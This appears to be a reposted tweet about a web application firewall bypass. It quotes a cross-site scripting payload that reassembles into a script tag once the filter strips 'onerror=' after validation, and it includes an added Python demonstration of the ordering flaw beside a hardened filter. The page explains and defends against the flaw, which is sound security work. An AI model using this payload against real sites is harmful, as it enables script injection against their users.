WAF bypass of the day: <scronerror=ipt>prompt(document.domain)</scronerror=ipt>
-
The WAF I was testing removes the string "onerror=" *after* validating that there are no malicious tags, leaving <script> in the output.
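The ordering flaw described in the tweet above, as an added example (not part of the original thread and not the tested WAF's code). `TAG_RULE`, `flawed_filter` and `hardened_filter` are hypothetical names and the tag rule is an assumed stand-in; the hardened version applies the rewrite first and validates the string that is actually emitted.

```python
import re

# Assumed stand-ins for the WAF's two rules; the real product's rules are not on the page.
TAG_RULE = re.compile(r"<\s*/?\s*script\b", re.IGNORECASE)
STRIPPED = re.compile(re.escape("onerror="), re.IGNORECASE)


class Blocked(Exception):
    """Raised when the tag rule matches."""


def validate(value: str) -> str:
    if TAG_RULE.search(value):
        raise Blocked(value)
    return value


def flawed_filter(value: str) -> str:
    # Order described in the tweet: validate first, then remove "onerror=".
    # The string that leaves the filter is never checked.
    return STRIPPED.sub("", validate(value))


def hardened_filter(value: str) -> str:
    # Apply every rewrite first, repeating until nothing changes, then
    # validate the exact string that will be emitted.
    previous = None
    while previous != value:
        previous, value = value, STRIPPED.sub("", value)
    return validate(value)


def is_blocked(filter_fn, value: str) -> bool:
    try:
        filter_fn(value)
        return False
    except Blocked:
        return True


# Constructed inputs; the first is the string quoted in the tweet.
TWEET_INPUT = "<scronerror=ipt>prompt(document.domain)</scronerror=ipt>"
BENIGN_INPUT = "<b>hello</b>"

if __name__ == "__main__":
    print("flawed output  :", flawed_filter(TWEET_INPUT))
    print("hardened blocks:", is_blocked(hardened_filter, TWEET_INPUT))
    print("benign passes  :", hardened_filter(BENIGN_INPUT))
```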
-
Replace to "onerror=", I think.